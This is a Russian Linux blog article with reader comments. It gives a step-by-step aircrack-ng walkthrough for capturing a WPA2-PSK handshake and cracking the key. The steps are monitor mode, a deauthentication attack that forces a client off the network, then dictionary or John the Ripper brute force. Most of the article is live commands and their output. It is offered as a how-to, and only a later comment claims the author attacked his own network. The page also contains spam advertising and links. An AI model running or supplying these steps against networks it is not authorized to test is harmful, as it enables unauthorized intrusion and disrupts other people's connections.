Приветствую Вас, Гость! Регистрация RSS

Linux Free

Среда, 23.01.2019
Главная » Статьи » Сети

WEP WLAN Сеть Инструкция модуля aircrack-ng
    * Переводим интерфейс в "monitor mode"
    * Находим сети защищенные с помощью WPA2 и Pre Shared Key
    * Захватываем все пакеты
    * Деавторизуем клиента, для захвата начального обмена пакетами.
    * Взламываем ключ используя словари (или с помощью John The Ripper)

 Я использовал карточку Dlink DWL-G122 (USB) во время написания данной статьи. В Backtrack4 данное устройство видно под именем wlan0.

    Доставка грузов в Китай контейнерными перевозками является одним из самых надежных и недорогих способов перевозки. Обращайтесь к нам за подробностями.

Для начала переводим карту в режим "monitor mode" :

root@bt:~# airmon-ng
Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)

Сделано, и теперь мы можем использовать карту как mon0

Теперь сканим доступные беспроводные сети, использующие WPA2 / PSK :

root@bt:~# airodump-ng mon0
 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                        
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                   
 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet                                                 
 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           
 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet

Остановите airodump-ng и запустите его заново, записывая все пакеты в файл:

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

В данный момент мы имеем два варианта развития событий: либо дем пока клиент совершит подключение и произойдет процедура авторизации, либо деавторизуем подключенного клиента и тем самым заставим его переподключиться. Время - деньги, поэтому давайте проведем небольшой акт насилия. Нам необходимы bssid точки доступа (-a) и mac адрес подключенного клиента (-c)

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

В результате airodump-ng должен показать "WPA Handshake:” в правом верхнем углу:

 CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7                                        
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                               
 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet                                             
 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                          
 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230

Остановите airodump-ng и убедитесь что все необходимые файлы созданы

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

С этого момента вам не нужно быть где то неподалеку от точки доступа. Весь взлом будет происходить оффлайн, поэтому вы можете остановить airodump и другие процессы. В действительности, вы можете запустить процесс взлома и идти спать, гулять и прочее... Взлом WPA2 PSK базируется на брутфорсе, и может занять длительное время. Существует два пути взлома: первый довольно быстрый, но не гарантирует успеха, а второй довольно медленный, но гарантирует что рано или поздно вы найдете ключ.

Первый метод основывается на списках/словарях. Большое количество данных файлов вы можете найти в интернете (например www.theargon.com), или вы можете сгенерировать его самостоятельно используя утилиты, подобные John The Ripper. Как только словарь создан, вы можете запустить aircrack-ng с данным словарем и файлом .cap, который содержитWPA2 Handshake.

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

 
Успешность взлома напрямую зависит от сложности пароля. Другими словами, вам может повезти и вы найдете ключ сразу, или не найдете его совсем.
Следующий метод, брутфорс, будет успешным практически наверняка, но может занять очень длительный срок. Необходимо понимать, что ключ WPA2 может содержать до 64-ех символов. Для начала взлома, если вы хотите использовать John The Ripper для создания всех возможных парольных комбинаций, выполните следующую команду.
 

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

Категория: Сети | Добавил: Alexandrlin (24.05.2010) E
Просмотров: 45542 | Комментарии: 8 | Рейтинг: 3.0/3
Всего комментариев: 8
8 Kneerlefror  
Данный пост — одно из редких исключений, когда читаешь с удовольствием и что-то для себя выносишь. Спасибо Вам. Добавлю в избранноеhttp://voronezh.recikl.ru/ - . :)

7 Alexandrlin  
все это можно найти в интернете, это я делал, нужно было просто взломать собственной сети... на чужих я не хочу эксперементировать....

6 Liska  
Спасибо, очень интересный блог.

5 Strezz  
root@sga-K42Dr:/home/sga# aireplay-ng -0 1 -a 00:02:2D:05:42:A4 -c 00:02:2D:05:42:A4 mon0
03:40:43 Waiting for beacon frame (BSSID: 00:02:2D:05:42:A4) on channel -1
03:40:43 mon0 is on channel -1, but the AP uses channel 1

также на всяк случай еще вот:
Code

CH 1 ][ Elapsed: 3 mins ][ 2011-01-28 03:42 ][ fixed channel mon0: -1


BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E


00:02:2D:05:42:A4 -89 100 1537 285 1 1 47 WPA2 r
Решение кто нибудь нашол?

4 Alexandrlin  
http://takeworld.blogspot.com/2008/08/wi-fi-2.html

еще хорошая статья по данной теме...


3 Игорь  
Отличная статья, удачи в развитии проекта.

2 RLV  
Молодцы! все для "танкистов". Еще бы разжевать что означает каждая строчка.

1 sga_  
Будте добры, подскажите в чем проблема...
Code

root@sga-K42Dr:/home/sga# aireplay-ng -0 1 -a 00:02:2D:05:42:A4 -c 00:02:2D:05:42:A4 mon0
03:40:43  Waiting for beacon frame (BSSID: 00:02:2D:05:42:A4) on channel -1
03:40:43  mon0 is on channel -1, but the AP uses channel 1

также на всяк случай еще вот:
Code


CH  1 ][ Elapsed: 3 mins ][ 2011-01-28 03:42 ][ fixed channel mon0: -1  
  

  BSSID  PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH E
  

  00:02:2D:05:42:A4  -89 100  1537  285  1  1  47  WPA2  r

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]